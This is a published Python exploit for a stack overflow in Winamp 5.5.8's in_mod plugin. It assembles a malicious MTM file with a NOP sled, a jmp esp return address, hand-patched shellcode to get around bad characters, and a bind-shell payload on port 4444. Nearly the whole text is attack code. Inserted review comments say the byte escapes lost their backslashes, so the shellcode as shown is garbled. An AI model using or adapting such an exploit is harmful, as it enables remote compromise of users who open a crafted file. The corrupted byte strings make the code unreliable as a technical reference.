
# Title : Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit
# Published : 2010-10-19
# Author : Mighty-D


#!/usr/bin/python
# Pwn And Beans by Mighty-D presents:
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC by fdisk
# Exploit by Mighty-D
# Special thanks to:
# fdisk: Who wrote the skeleton of what you are looking at
# Ryujin: For pointing the bug
# Muts: For bringing the pain and the omelet ideas that weren't used
# dijital1 and All the EDB-Team
# The guys from UdeA, Ryepes, HerreraDavid, GomezRam7
# Just one comment: Stupid badchars!!!!!!!

# Fixed building blocks of the output file: a file header, a long filler
# region and a 4-byte value the author labels as a return address.
# NOTE(review): as listed here the strings contain the two characters
# `x4D`, `x90`, ... rather than byte escapes - the backslashes appear to
# have been dropped when the page was extracted, so these literals are
# plain ASCII text (the length of `nopsled` is therefore 2 * 58207).
header = "x4Dx54x4Dx10x53x70x61x63x65x54x72x61x63x6Bx28x6Bx6Fx73x6Dx6Fx73x69x73x29xE0x00x29x39x20xFFx1Fx00x40x0E"
header += "x04x0C" * 16

nopsled = "x90" * 58207

# The author notes this value is specific to one Windows XP build (see the
# version/SP comment in the file header); the page gives no other target.
eip = "xEDx1Ex95x7C" # jmp esp WIN XP SPANISH change at will

patch_shellcode = "x90" * 16
patch_shellcode += "x90x33xDB" # Set EBX to zero
patch_shellcode += "x54x5B" # PUSH ESP ; POP EBX  GET THE RELATIVE POSITION
patch_shellcode += "x81xEBx95xFCxFFxFF" # make EBX point to our shell
patch_shellcode += "x43"*13 # Move EBX as close as we can to the first badchar
patch_shellcode += "x90"*4 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*1 # Move EBX to the first badchar
patch_shellcode += "x80x2Bx20" # Set it to 13 -  verified
patch_shellcode += "x43"*3 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 05  - verified
patch_shellcode += "x43"*16 # Move EBX to the next badchar
patch_shellcode += "x80x2BxEC" # Set it to 21 - verified
patch_shellcode += "x43"*1 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx7C" # Set it to 8e - verified
patch_shellcode += "x90"*8 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*30 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 05 - verified
patch_shellcode += "x90"*8 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*11 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx42" # Set it to CB - verified
patch_shellcode += "x43"*1 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx78" # Set it to 92 - verified
patch_shellcode += "x90"*26 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*18 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 04 - verified
patch_shellcode += "x90"*16 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*15 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 02 - verified
patch_shellcode += "x43"*8 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx21" # Set it to EC - verified
patch_shellcode += "x43"*1 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx7C" # Set it to 8e - verified
patch_shellcode += "x90"*14 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*18 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx49" # Set it to c1 - verified
patch_shellcode += "x90"*13 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*4 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to EA, but we need F6
patch_shellcode += "x80x2BxF4" # Set it to F6 - verified
patch_shellcode += "x43"*9 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 11 - verified
patch_shellcode += "x43"*10 # Move EBX to the next badchar
patch_shellcode += "x90"*3 # Nop sled to avoid damage from CrLf
patch_shellcode += "x80x2BxCD" # Set it to 3D - verified
patch_shellcode += "x43"*3 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 07 - verified
patch_shellcode += "x43"*11 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 12 - verified
patch_shellcode += "x43"*4 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 12 - verified
patch_shellcode += "x90"*13 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*4 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 12 - verified
patch_shellcode += "x43"*8 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 12 - verified
patch_shellcode += "x90"*19 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*11 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx8E" # Set it to 7F - verified
patch_shellcode += "x43"*1 # Move EBX to the next badchar
patch_shellcode += "x80x2BxDF" # Set it to 2B - verified
patch_shellcode += "x43"*8 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx1E" # Set it to EC - verified
patch_shellcode += "x90"*11 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*12 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 8 - verified
patch_shellcode += "x90"*28 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*29 # Move EBX to the next badchar
patch_shellcode += "x80x2Bxa7" # Set it to 66 - verified
patch_shellcode += "x43"*1 # Move EBX to the next badchar
patch_shellcode += "x90"*4 # Nop sled to avoid damage from CrLf
patch_shellcode += "x80x2Bxb8" # Set it to 52 - verified
patch_shellcode += "x90"*9 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*17 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 3 - verified
patch_shellcode += "x90"*9 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*3 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 12 - verified
patch_shellcode += "x90"*12 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*2 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 3 - verified
patch_shellcode += "x43"*7 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 2 - verified
patch_shellcode += "x90"*10 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*6 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 13 - verified
patch_shellcode += "x43"*3 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to  5 - verified
patch_shellcode += "x43"*3 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx1B" # Set it to F2 - verified
patch_shellcode += "x43"*1 # Move EBX to the next badchar
patch_shellcode += "x80x2BxF4" # Set it to 16 - verified
patch_shellcode += "x90"*19 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*4 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 10 - verified
patch_shellcode += "x43"*4 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 10 - verified
patch_shellcode += "x90"*20 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*17 # Move EBX to the next badchar
patch_shellcode += "x90"*28 # Lazy nopsled
patch_shellcode += "x43"*16 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx26" # Set it to E7 - verified
patch_shellcode += "x90"*18 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*1 # Move EBX to the next badchar
patch_shellcode += "x80x2BxBE" # Set it to 4C - verified
patch_shellcode += "x43"*7 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 5 - verified
patch_shellcode += "x90"*(66)

# win32_bind -  EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub
shellcode  = "x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73"
shellcode += "x33" # Should be 13
shellcode += "xa9x41"
shellcode += "x25" # should be 05
shellcode += "x3fx83xebxfcxe2xf4x55x2bxeex72x41xb8xfaxc0"
shellcode += "x56" # x21x8e Ripped
shellcode += "x53x8dx65x8ex7ax95xcax79x3axd1x40xeaxb4"
shellcode += "xe6x59x8ex60x89x40xeex76x22x75x8ex3ex47x70xc5xa6"
shellcode += "x25" # should be 05
shellcode += "xc5xc5x4bxaex80xcfx32xa8x83xee" # xcbx92
shellcode += "x15x21x17"
shellcode += "xdcxa4x8ex60x8dx40xeex59x22x4dx4exb4xf6x5d"
shellcode += "x24" #Should be 04
shellcode += "xd4xaax6dx8exb6xc5x65x19x5ex6ax70xdex5bx22"
shellcode += "x22" # Should be 02
shellcode += "x35xb4xe9x4dx8ex4fxb5" # xec8e Ripped
shellcode += "x7fxa1x1fx6dxb1xe7x4fxe9x6f"
shellcode += "x56x97x63x6cxcfx29x36x0d" # xc1 Ripped
shellcode += "x36x76x0d" # xf6 ripped
shellcode += "x15xfaxef"
shellcode += "xc1x8axe8xc3x92"
shellcode += "x31" # Should be 11
shellcode += "xfaxe9xf6xc8xe0x59x28xacx0d" # x3d ripped
shellcode += "xfcx2b"
shellcode += "x27" # should be 07
shellcode += "xc0x79x29xdcx36x5cxecx52xc0x7f"
shellcode += "x32" # should be 12
shellcode += "x56x6cxfa"
shellcode += "x32" # should be 12
shellcode += "x46x6cxea"
shellcode += "x32" # should be 12
shellcode += "xfaxefxcfx29x14x63xcf"
shellcode += "x32" #should be 12
shellcode += "x8cxde"
shellcode += "x3cx29xa1x25xd9x86x52xC0" # x7fx2b Ripped
shellcode += "x15x6exfcxbexd5x57"
shellcode += "x0d" # xec Ripped
shellcode += "x2bxd6xfexbexd3x6cxfcxbexd5x57x4c"
shellcode += "x28" # should be 08
shellcode += "x83x76"
shellcode += "xfexbexd3x6fxfdx15x50xc0x79xd2x6dxd8xd0x87x7cx68"
shellcode += "x56x97x50xc0x79x27x6fx5bxcfx29" # x66x52 Ripped
shellcode += "x20xa4x6fx6f"
shellcode += "xf0x68xc9xb6x4ex2bx41xb6x4bx70xc5xcc"
shellcode += "x23" # shoudl be 03
shellcode += "xbfx47"
shellcode += "x32" #Should be 12
shellcode += "x57"
shellcode += "x23" # Should be 03
shellcode += "x29xacx24x3bx3dx94"
shellcode += "x22"  # should be 02
shellcode += "xeax6dx4dx57xf2"
shellcode += "x33" # should be 13
shellcode += "xc0xdc"
shellcode += "x25" # should be 5
shellcode += "xfaxe9" # xf2x16 Ripped
shellcode += "x57x6exf8"
shellcode += "x30" #should be 10
shellcode += "x6fx3exf8"
shellcode += "x30" # Should be 10
shellcode += "x50x6e"
shellcode += "x56x91x6dx92x70x44xcbx6cx56x97x6fxc0x56x76xfaxef"
shellcode += "x22x16xf9xbcx6dx25xfaxe9xfbxbexd5"
shellcode += "x57xd7x99" #xe7x4c Ripped
shellcode += "xfaxbexd3xc0x79x41"
shellcode += "x25" # should be 05
shellcode += "x3f"

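payload = header + nopsled + eip + patch_shellcode + shellcode

# Write the assembled buffer to the output file.
# - The original body lines had lost their indentation (a syntax error as
#   listed); restored here.
# - `with` closes the handle even if the write fails, instead of relying on
#   an explicit close() that is skipped on error.
# - The bare `except:` would report any failure, including a NameError from
#   a missing variable above or a KeyboardInterrupt, as "Cannot create
#   file"; only I/O errors are caught now and the reason is shown.
# - `file` shadowed the builtin of the same name; renamed.
# - Text mode ("w") is kept exactly as in the original.
try:
    with open("crash.mtm", "w") as out_file:
        out_file.write(payload)
    print("MTM file generated successfuly")
except (IOError, OSError) as exc:
    print("Cannot create file: %s" % exc)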